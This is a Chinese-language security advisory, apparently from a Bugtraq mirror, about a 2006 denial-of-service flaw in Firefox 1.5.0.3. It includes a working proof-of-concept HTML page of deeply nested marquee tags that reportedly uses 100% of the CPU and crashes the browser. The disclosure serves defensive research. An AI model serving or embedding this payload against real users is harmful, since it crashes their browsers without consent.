Mozilla Firefox marquee标签处理拒绝服务漏洞
发布日期:2006-05-30
更新日期:2006-05-30
受影响系统:Mozilla Firefox 1.5.0.3
描述:
BUGTRAQ ID:
18165
Mozilla Firefox是一款非常流行的开源WEB浏览器。
Mozilla Firefox对HTML标签的处理实现上存在漏洞,恶意HTML网页可能导致浏览器崩溃。
Mozilla Firefox对畸形<marquee> HTML标签的处理会占用100%的CPU资源,可能导致浏览器崩溃。
<*来源:n00b
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=114901604614510&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head>
<title>Credit to n00b..</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marq \
uee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>< \
marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu \
ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><m \
arquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marque \
e><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma \
rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee \
><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq \
> uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> \
> </marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma \
> rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marque \
> e></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></m \
arquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee \
></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></mar \
> quee></marquee></marquee></marquee></marquee>
</body>
</html>
建议:
厂商补丁:
Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mozilla.org/浏览次数:3972
严重程度:0(网友投票)